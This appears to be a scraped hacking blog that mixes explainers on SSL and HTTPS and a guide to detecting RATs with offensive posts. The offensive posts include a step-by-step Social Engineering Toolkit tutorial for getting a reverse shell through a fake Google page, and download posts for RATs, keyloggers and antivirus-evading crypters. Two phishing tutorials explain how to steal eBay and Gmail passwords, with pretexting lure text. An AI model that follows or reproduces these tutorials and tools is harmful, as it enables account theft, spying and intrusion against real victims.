Secure Sockets Layer (SSL) - An Introduction

In the OSI model a reference model for effective communication we find a layer named transport layer. Just like a physical layer (where viruses attack normally) transport layer also need some sort of security because transport layer is responsible for transmission of data.

So what actually makes transport layer to make the transmission secure and to protect the data from any intruder.

Have you ever noticed that when you visit some website it starts with http:// and whenever you visit some sort of money transfer and other important websites you find https:// point is clear https means a secure communication it means that your data that transfer from this connection secure by using some cryptography techniques.

SSL or secure sockets layer are cryptographic protocols that provide secure communication over the Internet. So what actually a cryptography is " Cryptography is a science of secrete communication".

SSL uses two keys to encrypt data − a public key known to everyone and a private or secret key known only to the recipient of the message.  

HTTP VS HTTPS 

 

The above picture shows that when ALICE sends the confidential information over insecure channel that there is a chance to sniff this confidential information (it might be a credit card information or may be your password etc). So the point is that an attacker can easily sniff this data and can easily read, understand and use for illegal activities because the data transfer in plain text regardless of any encryption it is simply a HTTP connection. 

Now consider the second picture when an user send some sort of information over secure channel means if someone using HTTPS than the data first encrypt by using cryptography technique than it sends over channel, so in this case if someone sniff this data than he/she not able to understand it. 

The above broad picture has clearly shows that HTTPS is secure, but how HTTPS is secure? Because it uses secure sockets layer (SSL). A website can implement HTTPS by purchasing an SSL Certificate.

Where there's a will there's a way. By following this amazing quote some researcher has discovered some ways to crack/hack SSL certificate too. To hack SSL certificate we will post an article later on.

Read More

Hacking Windows Using Social Engineering Toolkit and Backtrack 5

What is Social Engineering Toolkit ?
The Social-Engineer Toolkit (SET) is specifically designed to perform advanced attacks against the human element. SET was designed to be released with the http://www.social-engineer.org launch and has quickly became a standard tool in a penetration testers arsenal. SET was written by David Kennedy (ReL1K) and with a lot of help from the community it has incorporated attacks never before seen in an exploitation toolset. The attacks built into the toolkit are designed to be targeted and focused attacks against a person or organization used during a penetration test.


Actually this hacking method will works perfectly with DNS spoofing or Man in the Middle Attack method. Here in this tutorial I’m only write how-to and step-by-step to perform the basic attack, but for the rest you can modified it with your own imagination.  


In this tutorial we will see how this attack methods can owned your computer in just a few steps…
The success possibility of this attack depend on victim browser. If the victim never update their browser, the possibility can be 85% or more. 


Requirement : 
1.  Backtrack 5 or Backtrack 4


Step By Step : 
1. Change your work directory into /pentest/exploits/set/ 

2. Open Social Engineering Toolkit (SET) ./set and then choose "Website Attack Vectors" because we will attack victim via internet browser. Also in this attack we will attack via website generated by Social Engineering Toolkit to open by victim, so choose "Website Attack Vectors" for this options. 

3. Usually when user open a website, sometimes they don't think that they are opening suspicious website that including malicious script to harm their computer. In this option we will choose "The Metasploit Browser Exploit Method" because we will attack via victim browser. 

4. The next step just choose "Web Templates", because we will use the most famous website around the world that already provided by this Social Engineering Toolkit tools. 

5. There are 4 website templates Ready To Use for this attack methods, such as GMail, Google, Facebook, and Twitter. In this tutorial I will use Google, but if you think Facebook or Twitter more better because it's the most accessed website, just change into what do you want. 

6. For the next step…because we didn't know what kind of vulnerability that successfully attack the victim and what type of browser, etc, in this option we just choose "Metasploit Browser Autopwn" to load all vulnerability Social Engineering Toolkit known. This tools will launch all exploit in Social Engineering Toolkit database. 



7. For payload options selection I prefer the most use Windows Shell Reverse_TCP, but you also can choose the other payload that most comfortable for you. 



8. The next step is set up the Connect back port to attacker computer. In this example I use port 4444, but you can change to 1234, 4321, etc 

9. The next step just wait until all process completed and also wait until the server running. 

10. When the link given to user, the victim will see looks-a-like Google (fake website). When the page loads it also load all malicious script to attack victim computer. 



11. In attacker computer if there's any vulnerability in victim computer browser it will return sessions value that mean the exploit successfully attacking victim computer. In this case the exploit create new fake process named "Notepad.exe". 

12. To view active sessions that already opened by the exploit type "sessions -l" for listing an active sessions. Take a look to the ID…we will use that ID to connect to victim computer. 



13. To interract and connect to victim computer use command "sessions -i ID". ID is numerical value that given when you do sessions -l. For example you can see example in picture below. 

14. Victim computer already owned. I'm practice to create this tutorial using Virtual Machine so it will not harm other computer and also you can doing a lot of experience with your OS.

Read More

Darkcomet Crypter

Add Icon For Fud Result working with all rats and stlrs

File Info

Report date: 2011-04-23 10:12:40 (GMT 1)
File name: darkcomet-crypter-exe
File size: 1167360 bytes
MD5 Hash: 703fd6381d6585a2d5bcb499d8ca7119
SHA1 Hash: cf2d12fd5cb1feb3cede887d3176d00bc1064b62
Detection rate: 4 on 10 (40%)
Status: INFECTED

Detections

Avast -
AVG -
Avira AntiVir - TR/Dropper.Gen
ClamAV -
Comodo -
Emsisoft - HackTool.Win32.VB.jz!IK
F-Prot - W32/VBTrojan.17!Generic
Ikarus - HackTool.Win32.VB.jz
TrendMicro -
Zoner -

Scan report generated by

NoVirusThanks.org

Download

Read More

The Difference Between HTTP and HTTPS

HTTPS : Hyper Text Transfer Protocol Secure HTTPS is combination of Hyper Text Transfer Protocol and Secure Socket Layer protocol(SSL) / Transport Layer Security(TLS) to provide encrypted communication between web server and client. Usually HTTPS used for internet banking, payment transaction, login page, etc. This protocol use port 443 for communication.

Website that already use this protocol is GMail.com, and also other websites such as PayPal, Amazon, etc. 
Let's see the connection between our computer and web server when we made connection using HTTPS using netstat -an. 

As we can see from the picture, client computer opened random local ports and open port 443 on server side.   


Are HTTPS (Hyper Text Transfer Protocol Secure) Secure? 
To answer this question, let's see experiment below. 
In this experiment, there's 2 person in one wireless network BadGuy and NiceGuy. NiceGuy trying to open http://gmail.com then login into it. In different place, BadGuy is in the same wireless network with NiceGuy as shown in the picture below : 

When BadGuy trying to capture all packet data to/from access point, it will be different when NiceGuy using HTTPS for its connection. For more clear description, lets see the image below when NiceGuy Input username and password on GMail login page. 

as you can see in above picture, it's use https:// for connection between client and web server. Then we will see what BadGuy do after NiceGuy using HTTPS for his connection. This BadGuy really like Wireshark, so he try again to capture the data and hope there's something interesting there. 

BadGuy didn't find plain data there, every data send to / send from server is encrypted. The picture above is the login information(maybe) data that has already captured by BadGuy, but I think BadGuy cannot break the encrypted data only in a few days/months/year or maybe we can called "impossible" (we still didn't know when the possible time to break into it).   


HTTPS Conclusion 
Packet data sent using HTTPS is encrypted, anyone cannot see the packet data inside public network. That's why HTTPS usually used for banking or transaction on internet, and also login page or other page need to encrypt the data.

Read More

XtremeRAT v2.7.1

This is a tool that allow you to control your computer from anywhere in world.
With full support to Unicode language, you will never have problem using this software.
Here you can find new updates, informations and tutorials about this software.

Version 2.7 (18/05/2011) Last Update

- Added USB Spreader.
- Added Mouselogger.
- Added upload files and execute directly.
- Webcam function changed.
- Some language corrections.
- Select webcam and desktop capture functions to start automatically.
- New method to identify your servers.
- Corrected some bugs using preview images in File Manager.
- Upload files to FTP server using File Manager.
- Corrected some bugs using grab passwords function.

:scan:

File Info

Report date: 2011-05-20 17:48:33 (GMT 1)
File name: cliente-exe
File size: 3517440 bytes
MD5 Hash: 86a349f2becb28bead0cabcfc4264579
SHA1 Hash: 4bffdda39c1f78edcb4c90a6a03756ca424f7
Detection rate: 1 on 6 (17%)
Status: INFECTED

Detections

AVG -
Avira AntiVir -
ClamAV -
Emsisoft -
TrendMicro -
Zoner - TrojanDownloader.Delf.PYW

Scan report generated by

NoVirusThanks.org

DOWNLOAD

Read More

xtreme rat v2.9

Version 2.9 (19/06/2011)

Here some changes since last version: Please, update your servers.

- Corrected a bug in file manager using "run with params".

- Corrected error when open keylogger function.

- Added no injection option.

- Added option to select capture audio automatically.

- Added new special folders in file manager.

- Corrected a tray icon bug.

- Added auto update function.

- Added a option to block connections from IP list.

- Corrected flags problem.

- Corrected chrome passwords.

- Corrected a bug using download files in file manager.

- Added a button in file manager to update drives and network connections list.

- Added in file manager a new thumbnail preview function.

- Added CPU usage column in process manager.

- Added mass search files.

- Added a option to open directory of the selected process in process manager.

- Added a funny option into window manager: Crazy Window.

- Added disconnect server option.

DOWNLOAD

Read More

How to Know if You Are Infected with RATs or Keyloggers

How to Know if You Are Infected with RATs or Keyloggers

In this post i am going to show you how to find out when you are infected with a RAT or Keylogger without using any complex tools. Now i believe most of you might know that you need to have an internet connection to make a RAT or a Keylogger work, which would mean, if you are not connected to internet, you don't have to worry about being infected with RAT or Keylogger Ok, so for those who have internet connection and think they are being infected with a Trojan, here is a little guide that can solve your problem.

1. Now every program has their own process which can be seen on task manager. So the first thing to do is to find out which process theTrojan is being attached to. If you see some unknown process search that on google. A good hacker will always makes sure he hides its process with a Windows based Process, for eg. svchost.exe or something like that.

2. If you cant find, then the next thing you can do is use cmd 
(to open cmd prompt, Click on Start--->Accessories-->Command prompt).
3. Once Command Prompt is opened, use this command: netstat -an |find /i "listening"
Note: The NETSTAT command will show you whatever ports are open or in use, but it is NOT a port scanning tool!

Now we wonder What this Command does? 
This command will show all the opening ports. Now check for any unknown port.

4. You can skip step 3 if you want, and can do this instead.

Open command prompt and type netstat -b

Now this command will show you the active connections with the process with their PID (Process Identifier) and also the packets.
Look out for SYN Packets and the Foreign address its been connecting with , check the process its been associated with, check the ports also. If you find that its connecting to some unknown ports, then you can say you have been backdoored.

5. Go to your task manager. On the top of it, 
click on View---> select Column---> Tick on PID (Process Identifier).
Match the suspicious Process with the Processes In task manager, check PID also.

Now most of the RATs resides on Start up. How to delete them from start up?
a) Go to regedit ---> HKLM\Software\Microsoft\Windows\Current version\Run
On the Right hand side, check for the process name which you find on step 4. if its not their. Check at
HKCU\Software\Microsoft\Windows\Current Version\Run
OR
Open Cmd prompt & type start msconfig. Go to Startup tab, you can check the startup process there.

I hope This Tutorial was easy and comprehensive.

Read More

Albertino Advanced RAT & Binder v4.2

Features:

[*]Polymorphic STUB[*]Flags[*]Multi-Tasking (Control all features on same client simultaneously.)[*]Reverse Connection (Connect Behind Routers)[*]UPnP Manager (Run RAT without port forwarding) (on most routers)[*]Multi-Clients Management (Control few clients simultaneously)[*]Remote Client Information (Basic client info)[*]Last 25 visited web pages[*]Send Fake Messages[*]Funny Stuff (Hide Desktop Icons, Hide Start Button, Hide Task Bar, Open-Close CD-Rom, Flip Screen, Swap Mouse buttons, Lock CTRL+ALT+DEL and more)[*]IE Options (Get Version, Change Home Page, Change IE Title, Open Website.)[*]Control Panel (Shutdown PC, Restart PC, Logoff User)[*]Clipboard Manager (Get Clipboard, Set Clipboard, Clear Clipboard.)[*]Remote Server Download (Download files and execute them.)[*]Printer Manager (Print to Default Printer)[*]File Manager (Download and Upload Locally, Execute, Delete File, Delete Folder, Make Folder, Rename, File Size)[*]Search Files (Search for any file or type on remote PC.)[*]Keylogger (Get all keystrokes from remote PC.)[*]Remote Passwords (FF 2,3 and 3.5+, IE7-8, Chrome, MSN (+Live Messenger), Trillian, IMVU, Pidgin, No-IP, DyDNS, FileZilla, Outlook (no drops or external references))[*]Processes Manager (List all running processes with the ability to close selected.)[*]Services Manager (List all services, Stop-Start Service, Disable-Manual-Autostart Service.)[*]Windows Manager (Control Opened Windows (Close, Hide, Minimize, Maximize, Restore, Default, No Active))[*]Remote Desktop (Watch Live Remote Desktop with ability to change Image Quality, Remote Control and many others))[*]Remote WebCam (Watch Live Remote WebCam (Save capture as video to file as XVID, DIVX and others))[*]Registry Editor (List, Create, Edit, Delete registry keys)[*]Send to All (Download and run file from website to all clients, Upload and run file from your PC to all clients, Run a DDOS (small bot))[*]Command Prompt Line (Manage remote cmd as your own.)[*]Client Geo Location[*]Multi Binder Included. (New polymorphic technology method)[*]Icon Changer[*]Assembly Editor

DOWNLOAD

Read More

Rapzo logger 1.8.2 Private Cracked

NVT Scam Result:

File Info

Report date: 2011-03-14 10:04:43 (GMT 1)

File name: express-exe

File size: 353280 bytes

MD5 Hash: 450b9c228262616aef4d7b0c3a5da1f2

SHA1 Hash: d5e489a2f9176b4d0cd47a43e4dab6a4d83eb019

Detection rate: 5 on 9 (56%) 

Status: INFECTED 

Detections

Avast - Win32:Spyware-gen [Spy]

AVG - Dropper.Generic3.NMD

ClamAV - 

Comodo - 

Emsisoft - Trojan-Spy.MSIL!IK

F-Prot - 

Ikarus - Trojan-Spy.MSIL

TrendMicro - 

Zoner - Dropper.Generic3.NPG

NoVirusThanks.org

Scan report generated by

Download

Read More

HackHound Crypter

File Info

Report date: 2011-04-17.

Link to scan: MyAvScan.com | Virus Scan Results for DSC104.exe

File name: DSC104.exe

File size: 384657 bytes

MD5 Hash: 9f56208325bd040a86be7a4a81b7bc2d 

SHA1 Hash: 5eb7819403470c309d21017908c57376d610c9ea 

Detection rate: 0 out of 33 

Status: CLEAN 

Detections

AVG - Clean.

Acavir - Clean.

Avast 5 -Clean.

Avast -Clean.

Avira -Clean.

BitDefender -Clean.

VirusBuster Internet Security -Clean.

Clam Antivirus -Clean.

COMODO Internet Security -Clean.

DrWeb -Clean.

eTrust-Vet -Clean.

F-PROT Antivirus -Clean.

F-Secure Internet Security -Clean.

G Data -Clean.

IKARUS Security-Clean.

Kaspersky Antivirus -Clean.

McAfee -Clean.

MS Security Essentials -Clean.

ESET NOD32 -Clean.

Norman -Clean.

Norton -Clean.

Panda Security -Clean.

A-Squared Security -Clean.

Quick Heal Antivirus -Clean.

Rising Antivirus -Clean.

Solo Antivirus -Clean.

Sophos -Clean.

Trend Micro Internet Security -Clean.

VBA32 Antivirus -Clean.

Vexira Antivirus -Clean.

Webroot Internet Security -Clean.

Zoner AntiVirus -Clean.

AhnLab V3 Internet Security -Clean.

MyAvScan.com

Scan report generated by

For thosee who said myavscan.com result is fake

here is Novirusthanks result of crypted cybergate

File Info

Report date: 2011-04-17 19:15:29 (GMT 1)

File name: dsc104-exe

File size: 384657 bytes

MD5 Hash: 9f56208325bd040a86be7a4a81b7bc2d

SHA1 Hash: 5eb7819403470c309d21017908c57376d610c9ea

Detection rate: 0 on 10 (0%) 

Status: CLEAN 

Detections

Avast - 

AVG - 

Avira AntiVir - 

ClamAV - 

Comodo - 

Emsisoft - 

F-Prot - 

Ikarus - 

TrendMicro - 

Zoner - 

NoVirusThanks.org

Scan report generated by

DOWNLOAD

p-s-s-s : U2ZTVlR0U3VUNFdyZWZTa1N0Z2tlZlNz

Crypted With ARMON-64-->ATOM-128-->B A S E-64 ( last without space)

Read More

How To Hack eBay User ID and Password

Today i want to teach you how to hack an eBay account password. For this i'll be using phishing. Phishing is one of the easiest ways to hack ANY site's user names and passwords. You upload a fake Webpage that looks like the legit one, then you send the link to your victim and trick him into entering his login info into the fake Webpage, which then sends the info to you. It's very simple and very effectively.

 How to hack eBay account password

1. First you need to download eBay Phisher

2. The downloaded file contains:

* ebay.html
* ebaylogin.php
* log.txt

3. Now upload these three files to a free webhost site. You can try
Your Free Hosting
Free Web Hosting
Reliable Free Hosting
cPanel Hosting
T35 Hosting
FREE Website Hosting & Premium Web Hosting
110mb.com
www.esmartstart.com
4. After that send this phisher link (ebay.html) to your victim and make him login to his eBay account using your sent Phisher.

5. Once he logs in to his eBay account using Phisher, all his typed eBay id and password is stored in "log.txt".

6. Now, open log.txt to get hacked eBay id and password as shown.

Thats it. I hope this phishing tutorial is fullproof and you can now hack eBay account password using eBay Phishing. I have tried to keep this eBay phishing tutorial simple for you to hack eBay account password.

Read More

How to Hack Gmail Account Password ?

Hi Friends , this is the best way to hack gmail account for passwords , tried it myself and worked!!!
Things That you Need for Hacking Gmail Account Password:
1. Gmail Phisher
2. Free Web hosting Site
3. Little bit of manual Work 

Introduction to Phishing
If you know little bit of Hacking then Its must for you know About Phishing i.e What is Phishing and how it works and most important How you can protect yourself from getting into the Trap. I will try to explain all of these in my article. 
First of all What are Phish pages and what is phishing?? Phish pages are basically the fake pages or virtual pages that looks similar to the original website Page. The only difference is the batch program running in the background i.e Original Webpage sends requests to Gmail server while Phish Page sends request to hacker's php server. Now Phishing is a password hacking technique commonly used by hackers using phish pages that looks similar to original web page. The only difference is the URL in the address bar so Guys One Important Tip for you all always check the Address bar while going to any website .
Now What is Smart Phishing, Normal phishing page sends the password to hacker but it doesn't redirects the page to original website but smart phishing does. Means victim can never know what really happened and his account is got hacked. He will only think that he has entered the wrong password as in second attempt the web page is original and he will be able to login and the most fantastic thing is that the original redirected page has username already entered in it that makes it even smarter. 


Now lets come to how it works?? When a user types a Username Password in the the text box,The info is sent to "login.php" which acts as a password logger and redirects the page to "LoginFrame2.htm" which shows "There has been a temporary error Please Try Again" in it . So when the person clicks on try again it redirects to the actual URL so that the victim does not know that your site is a fake site and gets his gmail.com password hacked.


HACKING GMAIL ACCOUNT STEP WISE:
1. First of all download the Gmail Phisher.
DOWNLOAD

2. Extract the rar file now you will get three files as given below:
gmail.html 
log.txt 
mail.php 

3. Upload all the Three files to any of the free Web hosting server. Remember while creating the account on these servers try the username as nearer as possible to the original URL like mail.gmaile or maile.gmall etc.. As its the most crucial step. Some Free Web hosting servers are given below you can also find few more for yourself.

www.yourfreehosting.net
www.esmartstart.com
www.110mb.com
www.drivehq.com
www.t35.com

4. Once you have uploaded all the three files to web hosting server now you have to send these to your victim. This is the most important step regarding smart phishing technique.
Most People use same password for orkut and gmail and here is the main hack lies. What you have to do you have to send the HTML email to the victim which looks similar to the Orkut scrap to his email you can easily do this using simple editing to the existing mail. Just you have to change the link with your phish link and content according to the person likings so that he will surely come inside the trap.
Another technique is that you can send him a request to join a particular community in the format orkut does.
And Last but the most important one Send him mail from Gmail Admin such that "We have seen illegal activity from your account and you need to verify your account and your account is temporarily disabled after this login. To unlock your account Verify your Email and in that link put your Phish link. Now Guys you all will came to know How it works. If you want to Protect yourself its must that you should know what techniques a Hacker can use to hack your Gmail Account.

5. Now After sending phisher to victim, once the user logs in to his Gmail account using your Phisher, his user ID and password are ours..And these are stored in log.txt What you have to do is just refresh your Web hosting account files.

6. The Log.txt file will contain the passwords and look like this:

Thats all Now you have hacked the password of victim. I hope you all have Liked It. 


NOTE: This is for Educational Purpose Only. Isoftdl is not responsible for any damage done by You.

Read More